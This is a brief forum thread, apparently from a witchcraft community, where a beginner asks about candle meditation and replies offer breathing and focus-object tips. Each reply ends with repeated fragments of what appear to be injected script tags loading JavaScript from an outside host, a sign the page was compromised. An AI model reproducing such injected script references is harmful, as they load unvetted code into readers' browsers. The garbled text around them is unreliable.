candle meditation

Merry meet all
Is candle meditation a good beginners meditation for a gal that wants to become a witch
My element is fire so i just thought it sounded like a good idea.

You can gain energy from any type of meditation. Just visiulise that every time you breathe in you take in some energy (but only breathe out, no energy intake/outrage is needed). sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

A lighted candle is fine to concentrate on during learning how to meditate. But any object will do for the same purpose. A small statue; a stone. I was taught using a small bowl of water. (I don't use it now. I can meditate at will.) sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
